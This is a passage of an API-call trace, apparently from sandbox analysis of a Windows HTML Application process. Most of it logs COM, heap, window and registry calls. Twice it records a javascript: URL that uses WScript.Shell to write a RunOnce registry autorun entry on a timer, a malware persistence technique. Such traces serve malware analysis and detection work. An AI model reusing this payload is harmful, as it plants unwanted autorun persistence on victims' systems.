This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33cd80 | out: ppvObject=0x33cd80*=0x75028d2c) returned 0x0 [0067.664] IUnknown:Release (This=0x75028d20) returned 0x1 [0067.664] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x33ce18, cchResult=0x1000, pcchResult=0x33ce00, dwReserved=0x0 | out: pwzResult="켄3", pcchResult=0x33ce00*=0x33cf04) returned 0x800c0011 [0067.664] IUnknown:Release (This=0x75028d2c) returned 0x1 [0067.664] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5548 [0067.665] IUnknown:Release (This=0x7a08d0) returned 0x2 [0067.665] IUnknown:Release (This=0x78ca14) returned 0x17 [0067.665] IUnknown:Release (This=0x78ca14) returned 0x16 [0067.665] IUnknown:Release (This=0x78ca14) returned 0x15 [0067.665] CoTaskMemFree (pv=0x0) [0067.665] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1a8) returned 0x7ac770 [0067.665] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f298 | out: lpCPInfo=0x33f298) returned 1 [0067.666] IUnknown:AddRef (This=0x790188) returned 0x3 [0067.666] IUnknown:AddRef (This=0x78ca14) returned 0x16 [0067.666] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2a0 | out: ppvObject=0x33f2a0*=0x78ca14) returned 0x0 [0067.666] IUnknown:Release (This=0x78ca14) returned 0x16 [0067.666] IUnknown:AddRef (This=0x78ca14) returned 0x17 [0067.666] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f2a4 | out: pdwScheme=0x33f2a4*=0xf) returned 0x0 [0067.666] IUnknown:Release (This=0x790188) returned 0x2 [0067.666] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x58) returned 0x7a3190 [0067.666] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164 [0067.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74c1e718, lpParameter=0x7a3190, dwCreationFlags=0x0, lpThreadId=0x7a31a4 | out: lpThreadId=0x7a31a4*=0x93c) returned 0x14c [0067.668] GetCurrentThreadId () returned 0x544 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x16 [0067.668] IUnknown:Release (This=0x78c78c) returned 0x3 [0067.668] IUnknown:Release (This=0x78af40) returned 0x3 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x15 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x14 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x13 [0067.668] IUnknown:Release (This=0x78af40) returned 0x2 [0067.668] IUnknown:Release (This=0x78ca14) returned 0x12 [0067.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.669] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.669] CoTaskMemFree (pv=0x7a1d98) [0067.669] CoTaskMemFree (pv=0x0) [0067.669] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.669] IUnknown:Release (This=0x78ca14) returned 0x11 [0067.669] CoTaskMemFree (pv=0x7a1b90) [0067.669] GetClientRect (in: hWnd=0x3027a, lpRect=0x33f7bc | out: lpRect=0x33f7bc) returned 1 [0067.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x78) returned 0x771c90 [0067.669] GetClientRect (in: hWnd=0x3027a, lpRect=0x771cbc | out: lpRect=0x771cbc) returned 1 [0067.669] OffsetRect (in: lprc=0x771cbc, dx=0, dy=0 | out: lprc=0x771cbc) returned 1 [0067.670] OffsetRect (in: lprc=0x771ccc, dx=0, dy=0 | out: lprc=0x771ccc) returned 1 [0067.670] RegisterClassExW (param_1=0x33f2d8) returned 0xc168 [0067.670] CoCreateInstance (in: rclsid=0x74c3bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x74c3bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7502b020 | out: ppv=0x7502b020*=0x7ac938) returned 0x0 [0067.677] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x7ac938, aaClassList=0x33f3d0*=0xc168, uSize=0x1) returned 0x0 [0067.677] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc168, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x3027a, hMenu=0x0, hInstance=0x74af0000, lpParam=0x794ec0) returned 0x302a0 [0067.677] GetWindowLongW (hWnd=0x302a0, nIndex=-20) returned 0 [0067.677] SetWindowLongW (hWnd=0x302a0, nIndex=-21, dwNewLong=7950016) returned 0 [0067.677] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x81, wParam=0x0, lParam=0x33efa4*=7950016, plResult=0x33ee1c | out: plResult=0x33ee1c) returned 0x1 [0067.677] NtdllDefWindowProc_W () returned 0x1 [0067.677] GetCurrentThreadId () returned 0x544 [0067.677] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.677] GetCurrentThreadId () returned 0x544 [0067.678] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x1, wParam=0x0, lParam=0x33efa4*=7950016, plResult=0x33ee1c | out: plResult=0x33ee1c) returned 0x1 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetCurrentThreadId () returned 0x544 [0067.678] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x33ee68 | out: plResult=0x33ee68) returned 0x1 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetCurrentThreadId () returned 0x544 [0067.678] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x33ee68 | out: plResult=0x33ee68) returned 0x1 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetCurrentThreadId () returned 0x544 [0067.678] NtdllDefWindowProc_W () returned 0x0 [0067.678] GetClassNameW (in: hWnd=0x3027a, lpClassName=0x33f3d8, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0067.678] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0067.679] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x7ac938, fRestoreLayout=1) returned 0x0 [0067.679] SendMessageW (hWnd=0x302a0, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0067.679] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.679] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x33f28c | out: plResult=0x33f28c) returned 0x1 [0067.679] NtdllDefWindowProc_W () returned 0x3 [0067.679] GetCurrentThreadId () returned 0x544 [0067.679] IntersectRect (in: lprcDst=0x33f60c, lprcSrc1=0x771cbc, lprcSrc2=0x771ccc | out: lprcDst=0x33f60c) returned 1 [0067.679] EqualRect (lprc1=0x33f60c, lprc2=0x771cbc) returned 1 [0067.679] InvalidateRect (hWnd=0x302a0, lpRect=0x0, bErase=1) returned 1 [0067.679] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xf0) returned 0x7a1c90 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x150) returned 0x7a1d88 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x140) returned 0x7ad520 [0067.680] IntersectRect (in: lprcDst=0x33f4f8, lprcSrc1=0x33f4f8, lprcSrc2=0x33f490 | out: lprcDst=0x33f4f8) returned 1 [0067.680] IntersectRect (in: lprcDst=0x33f4f8, lprcSrc1=0x33f4f8, lprcSrc2=0x33f490 | out: lprcDst=0x33f4f8) returned 1 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7a1ee0 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77dbc8 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xec) returned 0x7ad668 [0067.680] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.680] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.680] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77dc00 [0067.681] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79de48 [0067.682] GetCurrentThreadId () returned 0x544 [0067.682] GetCurrentThreadId () returned 0x544 [0067.682] GetCurrentThreadId () returned 0x544 [0067.682] IntersectRect (in: lprcDst=0x33f334, lprcSrc1=0x33f334, lprcSrc2=0x33f304 | out: lprcDst=0x33f334) returned 1 [0067.682] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f324 | out: lprcDst=0x7ad580) returned 1 [0067.682] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0067.683] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a8f88 [0067.683] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8f88 | out: hHeap=0x760000) returned 1 [0067.684] SetWindowPos (hWnd=0x302a0, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0067.684] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.684] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x46, wParam=0x0, lParam=0x33f5ec*=197280, plResult=0x33f488 | out: plResult=0x33f488) returned 0x1 [0067.684] NtdllDefWindowProc_W () returned 0x0 [0067.684] GetCurrentThreadId () returned 0x544 [0067.684] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0067.684] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x47, wParam=0x0, lParam=0x33f5ec*=197280, plResult=0x33f484 | out: plResult=0x33f484) returned 0x1 [0067.685] NtdllDefWindowProc_W () returned 0x0 [0067.685] GetCurrentThreadId () returned 0x544 [0067.685] SetTimer (hWnd=0x302a0, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0067.685] GetFocus () returned 0x0 [0067.685] EnumChildWindows (hWndParent=0x302a0, lpEnumFunc=0x74e10a73, lParam=0x33f4e4) returned 0 [0067.686] GetFocus () returned 0x0 [0067.686] SetFocus (hWnd=0x302a0) returned 0x0 [0067.690] NtdllDefWindowProc_W () returned 0x0 [0067.690] NtdllDefWindowProc_W () returned 0x0 [0067.691] NtdllDefWindowProc_W () returned 0x0 [0067.691] NtdllDefWindowProc_W () returned 0x0 [0067.691] NtdllDefWindowProc_W () returned 0x0 [0067.692] NtdllDefWindowProc_W () returned 0x0 [0067.692] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.693] NtdllDefWindowProc_W () returned 0x1 [0067.693] NtdllDefWindowProc_W () returned 0x0 [0067.696] NtdllDefWindowProc_W () returned 0x0 [0068.447] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0068.447] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x75300000 [0068.456] GetProcAddress (hModule=0x75300000, lpProcName="LresultFromObject") returned 0x75302663 [0068.456] LresultFromObject () returned 0xc171 [0069.652] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x7a2738 [0069.653] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9078 [0069.817] GetCurrentThreadId () returned 0x544 [0069.819] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a2738 | out: hHeap=0x760000) returned 1 [0069.820] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.820] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7a2738 [0069.820] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b41f8 [0069.820] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.821] IUnknown:QueryInterface (in: This=0x7964dc, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x33ed98 | out: ppvObject=0x33ed98*=0x7b3088) returned 0x0 [0069.821] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.821] IConnectionPointContainer:FindConnectionPoint (in: This=0x7b3088, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x33edb0 | out: ppCP=0x33edb0*=0x7b30b0) returned 0x0 [0069.821] IConnectionPoint:Advise (in: This=0x7b30b0, pUnkSink=0x7c2b60, pdwCookie=0x7c2b78 | out: pdwCookie=0x7c2b78*=0x7c2b60) returned 0x0 [0069.821] IUnknown:QueryInterface (in: This=0x7c2b60, riid=0x74afa638*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x33ed54 | out: ppvObject=0x33ed54*=0x7c2b60) returned 0x0 [0069.822] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7a2778 [0069.822] IUnknown:AddRef (This=0x7c2b60) returned 0x3 [0069.822] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b42d0 [0069.822] IUnknown:Release (This=0x7c2b60) returned 0x2 [0069.822] IUnknown:Release (This=0x7b30b0) returned 0x0 [0069.822] IUnknown:Release (This=0x7b3088) returned 0x0 [0069.822] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9108 [0069.823] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x48) returned 0x7b1400 [0069.823] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.824] GetMessageTime () returned 0 [0069.824] GetMessagePos () returned 0x0 [0069.824] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x33eeac | out: plResult=0x33eeac) returned 0x0 [0069.826] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.826] GetMessageTime () returned 0 [0069.826] GetMessagePos () returned 0x0 [0069.826] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x33e8dc | out: plResult=0x33e8dc) returned 0x0 [0069.827] GetCurrentThreadId () returned 0x544 [0069.827] GetCurrentThreadId () returned 0x544 [0069.827] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.827] GetMessageTime () returned 0 [0069.827] GetMessagePos () returned 0x0 [0069.827] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f060 | out: lpPoint=0x33f060) returned 1 [0069.828] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f060 | out: lpPoint=0x33f060) returned 1 [0069.828] GetCapture () returned 0x0 [0069.828] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x7afb38 [0069.828] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9138 [0069.828] IUnknown:AddRef (This=0x7c2b60) returned 0x5 [0069.828] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7b8e18 [0069.829] HTMLWindowEvents2:onresize (This=0x7c2b60, pEvtObj=0x418) [0069.829] IUnknown:Release (This=0x7c2b60) returned 0x4 [0069.829] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b8e18 | out: hHeap=0x760000) returned 1 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7afb38 | out: hHeap=0x760000) returned 1 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x33f29c | out: plResult=0x33f29c) returned 0x1 [0069.829] NtdllDefWindowProc_W () returned 0x0 [0069.829] GetCurrentThreadId () returned 0x544 [0069.829] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x7ac938, hWnd=0x302a0, phIMC=0x33f5c4 | out: phIMC=0x33f5c4*=0xc010b) returned 0x0 [0069.829] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x7ac938, hWnd=0x302a0, hIME=0x0, phPrev=0x33f5c4 | out: phPrev=0x33f5c4*=0xc010b) returned 0x0 [0069.830] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.830] IConnectionPointContainer:FindConnectionPoint (in: This=0x7b3088, riid=0x758221c8*(Data1=0x3050f613, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x33f434 | out: ppCP=0x33f434*=0x7b30a8) returned 0x0 [0069.830] IConnectionPoint:Unadvise (This=0x7b30a8, dwCookie=0x7c2b60) returned 0x0 [0069.830] IUnknown:AddRef (This=0x7c2b60) returned 0x5 [0069.830] IUnknown:Release (This=0x7c2b60) returned 0x4 [0069.830] IUnknown:Release (This=0x7c2b60) returned 0x3 [0069.830] IUnknown:Release (This=0x7b30a8) returned 0x0 [0069.830] IUnknown:Release (This=0x7b3088) returned 0x0 [0069.830] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.830] IUnknown:QueryInterface (in: This=0x7964dc, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x33f42c | out: ppvObject=0x33f42c*=0x7b3088) returned 0x0 [0069.830] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x60) returned 0x7b3088 [0069.830] IConnectionPointContainer:FindConnectionPoint (in: This=0x7b3088, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x33f430 | out: ppCP=0x33f430*=0x7b30b0) returned 0x0 [0069.830] IConnectionPoint:Unadvise (This=0x7b30b0, dwCookie=0x7c2b60) returned 0x0 [0069.830] IUnknown:AddRef (This=0x7c2b60) returned 0x4 [0069.830] IUnknown:Release (This=0x7c2b60) returned 0x3 [0069.831] IUnknown:Release (This=0x7c2b60) returned 0x2 [0069.831] IUnknown:Release (This=0x7b30b0) returned 0x0 [0069.831] IUnknown:Release (This=0x7b3088) returned 0x0 [0069.831] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b3088 | out: hHeap=0x760000) returned 1 [0069.831] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9138 | out: hHeap=0x760000) returned 1 [0069.831] IUnknown:Release (This=0x7964dc) returned 0x3 [0069.831] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9108 | out: hHeap=0x760000) returned 1 [0069.831] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.832] GetMessageTime () returned 0 [0069.832] GetMessagePos () returned 0x0 [0069.832] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x33f2ac | out: plResult=0x33f2ac) returned 0x0 [0069.832] GetCurrentThreadId () returned 0x544 [0069.832] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0069.832] GetMessageTime () returned 0 [0069.832] GetMessagePos () returned 0x0 [0069.832] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x7ac938, hWnd=0x302a0, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x33f2ac | out: plResult=0x33f2ac) returned 0x0 [0069.833] GetCurrentThreadId () returned 0x544 [0069.833] IsOS (dwOS=0x25) returned 1 [0069.833] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f4b8 | out: phkResult=0x33f4b8*=0x210) returned 0x0 [0069.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f4bc | out: phkResult=0x33f4bc*=0x214) returned 0x0 [0069.833] RegOpenKeyExW (in: hKey=0x214, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x33f478 | out: phkResult=0x33f478*=0x0) returned 0x2 [0069.833] RegOpenKeyExW (in: hKey=0x210, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x33f478 | out: phkResult=0x33f478*=0x218) returned 0x0 [0069.833] SHRegGetValueW () returned 0x0 [0069.833] RegCloseKey (hKey=0x218) returned 0x0 [0069.834] RegCloseKey (hKey=0x0) returned 0x6 [0069.834] RegCloseKey (hKey=0x0) returned 0x6 [0069.834] RegCloseKey (hKey=0x210) returned 0x0 [0069.834] RegCloseKey (hKey=0x214) returned 0x0 [0069.834] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73710000 [0071.901] GetVersionExW (in: lpVersionInformation=0x33efc4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33efc4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.901] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73710000 [0071.902] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x33f540, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.903] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x33f5a0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.904] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9108 [0071.904] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x33f58c, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.904] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x77da40, Size=0x48) returned 0x7b1450 [0071.904] ShowWindow (hWnd=0x302a0, nCmdShow=1) returned 1 [0071.904] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78ba60 | out: hHeap=0x760000) returned 1 [0071.904] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0071.904] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0071.904] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0071.905] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x78ba60 [0071.905] RegisterDragDrop (hwnd=0x302a0, pDropTarget=0x750296cc) returned 0x0 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetCurrentThreadId () returned 0x544 [0071.906] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0071.906] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0071.906] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0071.907] IInternetProtocolRoot:Continue (This=0x7abedc, pProtocolData=0x77db20) returned 0x0 [0071.907] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1a) returned 0x7c4a98 [0071.907] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f5f8 | out: ppu=0x33f5f8) returned 0x0 [0071.907] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33f4ec | out: ppvObject=0x33f4ec*=0x0) returned 0x80004002 [0071.907] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33f4ec | out: ppvObject=0x33f4ec*=0x79638c) returned 0x0 [0071.907] GetCurrentThreadId () returned 0x544 [0071.907] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f5a0 | out: phkResult=0x33f5a0*=0x244) returned 0x0 [0071.907] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet 